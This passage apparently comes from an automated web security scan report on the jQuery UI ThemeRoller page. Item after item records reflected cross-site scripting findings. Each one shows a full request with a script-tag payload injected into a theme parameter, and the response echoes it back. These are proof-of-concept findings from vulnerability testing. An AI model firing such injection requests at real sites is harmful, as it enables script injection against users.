08d71&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa52c0c"><script>alert(1)</script>392fcb08d71&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

1.9. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7add9"><script>alert(1)</script>6148fa48b45 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa7add9"><script>alert(1)</script>6148fa48b45&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa7add9"><script>alert(1)</script>6148fa48b45&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.10. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b9da"><script>alert(1)</script>86889186ca9 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=02b9da"><script>alert(1)</script>86889186ca9&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
8&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=02b9da"><script>alert(1)</script>86889186ca9&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColor
...[SNIP]...

1.11. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5748e"><script>alert(1)</script>247c52aef85 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=05748e"><script>alert(1)</script>247c52aef85&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=05748e"><script>alert(1)</script>247c52aef85&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault
...[SNIP]...

1.12. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53ba4"><script>alert(1)</script>d9d50feafdb was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=053ba4"><script>alert(1)</script>d9d50feafdb&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nt=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=053ba4"><script>alert(1)</script>d9d50feafdb&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgCo
...[SNIP]...

1.13. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15aa"><script>alert(1)</script>ffc4cddc3d9 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0f15aa"><script>alert(1)</script>ffc4cddc3d9&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
f7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0f15aa"><script>alert(1)</script>ffc4cddc3d9&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

1.14. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 870d8"><script>alert(1)</script>8356350c402 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0870d8"><script>alert(1)</script>8356350c402&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0870d8"><script>alert(1)</script>8356350c402&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222
...[SNIP]...

1.15. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb024"><script>alert(1)</script>61029ab1dc6 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0bb024"><script>alert(1)</script>61029ab1dc6&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0bb024"><script>alert(1)</script>61029ab1dc6&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203
...[SNIP]...

1.16. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e69a"><script>alert(1)</script>1b69ddd11c1 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=08e69a"><script>alert(1)</script>1b69ddd11c1&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Default=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=08e69a"><script>alert(1)</script>1b69ddd11c1&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgCo
...[SNIP]...

1.17. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a86e"><script>alert(1)</script>86153e925ae was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=03a86e"><script>alert(1)</script>86153e925ae&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
